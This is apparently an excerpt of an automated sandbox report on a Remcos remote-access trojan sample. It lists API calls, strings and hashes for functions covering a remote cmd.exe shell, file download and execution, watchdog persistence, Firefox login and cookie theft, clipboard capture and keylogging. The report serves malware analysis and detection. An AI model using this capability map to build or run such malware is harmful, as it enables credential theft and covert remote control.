                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 1170566393-0
                                                                                                            • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                            • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                            • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                            • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                            Function 0044EEB5 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00448706: RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                            • _free.LIBCMT ref: 0044EF21
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 614378929-0
                                                                                                            • Opcode ID: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                            • Instruction ID: 91765bf56145836b352927287b0900a7be963fc320189fecf9c5ab0789588b10
                                                                                                            • Opcode Fuzzy Hash: 7b4a2f6e9a04df5b0dd70cdaf72135a4707c1be432060349675b23e62071eba1
                                                                                                            • Instruction Fuzzy Hash: 2D01DB771043056BF321CF66984595AFBD9FB8A370F65051EE59453280EB34A806C778
                                                                                                            Function 00448706 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,0000000A,00000000,?,00446F74,00000001,00000364,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000,?), ref: 00448747
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 312c12ffde6a647d33f516a49ed2b80b9a93d0109b1a3352aa23be3e2c0072ab
                                                                                                            • Instruction ID: 09342868e9f2d6cc7f7b696f5049c05c0568eaa44df27644d65b9450949fa691
                                                                                                            • Opcode Fuzzy Hash: 312c12ffde6a647d33f516a49ed2b80b9a93d0109b1a3352aa23be3e2c0072ab
                                                                                                            • Instruction Fuzzy Hash: 9CF0E93250412467BB216A369D55B5F7748AF427B0B34802BFC08EA691DF68DD4182ED
                                                                                                            Function 00446AFF Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                            • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                            • Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
                                                                                                            • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                            Function 00404262 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Startup
                                                                                                            • String ID:
                                                                                                            • API String ID: 724789610-0
                                                                                                            • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                            • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                            • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                            • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                            Function 004260F7 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: recv
                                                                                                            • String ID:
                                                                                                            • API String ID: 1507349165-0
                                                                                                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                            Function 0042610E Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: send
                                                                                                            • String ID:
                                                                                                            • API String ID: 2809346765-0
                                                                                                            • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                            • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36

                                                                                                            Non-executed Functions

                                                                                                            Function 00406F06 Relevance: 46.3, APIs: 10, Strings: 16, Instructions: 849filesleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                              • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                              • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                              • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                              • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                            • API String ID: 2918587301-599666313
                                                                                                            • Opcode ID: 7bc08a52b947191524a54102a1c70bff9e0a08f253b560fcd637311ad74b5845
                                                                                                            • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                            • Opcode Fuzzy Hash: 7bc08a52b947191524a54102a1c70bff9e0a08f253b560fcd637311ad74b5845
                                                                                                            • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                            Function 00405042 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 280pipesleepfileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                            • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                            • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                            • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                            • API String ID: 3815868655-81343324
                                                                                                            • Opcode ID: 5a5e837b1a5c73d244bdc50f52d0c0277f8ea75593c2154cdaf09b4041bb4b09
                                                                                                            • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                            • Opcode Fuzzy Hash: 5a5e837b1a5c73d244bdc50f52d0c0277f8ea75593c2154cdaf09b4041bb4b09
                                                                                                            • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                            Function 00410F36 Relevance: 33.5, APIs: 7, Strings: 12, Instructions: 238threadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                            • API String ID: 65172268-860466531
                                                                                                            • Opcode ID: a717337548b7bc67ef5be46030ec01eef617e46586cf903e586267f0ffb0d611
                                                                                                            • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                            • Opcode Fuzzy Hash: a717337548b7bc67ef5be46030ec01eef617e46586cf903e586267f0ffb0d611
                                                                                                            • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                            Function 0040B335 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 145fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                            • Opcode ID: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                                                            • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                            • Opcode Fuzzy Hash: 76fc6f2f8938e12f39c523e25d48290a13894f358b4903df99732470634f51ee
                                                                                                            • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                            Function 0040B53A Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 130fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                            • API String ID: 3527384056-432212279
                                                                                                            • Opcode ID: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                                            • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                            • Opcode Fuzzy Hash: ca4c0e5d84f7cb7ee38c8e3133793af3c270269af9d1d2af5c27a16806cbf6ef
                                                                                                            • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                            Function 0040E219 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 212processCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                            • API String ID: 726551946-3025026198
                                                                                                            • Opcode ID: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                                            • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                            • Opcode Fuzzy Hash: fc54411cfe1b16664af1a362ddb9d5f33de03dcc47f8e28b32825c15ab13c746
                                                                                                            • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                            Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3520204547-0
                                                                                                            • Opcode ID: 92ff16621bb008ec349cac96769bc2e22541bc6f21a77906abd6e904815f1c10
                                                                                                            • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                            • Opcode Fuzzy Hash: 92ff16621bb008ec349cac96769bc2e22541bc6f21a77906abd6e904815f1c10
                                                                                                            • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                            Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                                            • API String ID: 0-3177665633
                                                                                                            • Opcode ID: ecb5ab5c14ee3ab28359405d5e5b6cf7107a78e006011c639a5add2d2d09b49f
                                                                                                            • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                            • Opcode Fuzzy Hash: ecb5ab5c14ee3ab28359405d5e5b6cf7107a78e006011c639a5add2d2d09b49f
                                                                                                            • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                            Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                            • GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
                                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                            • ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
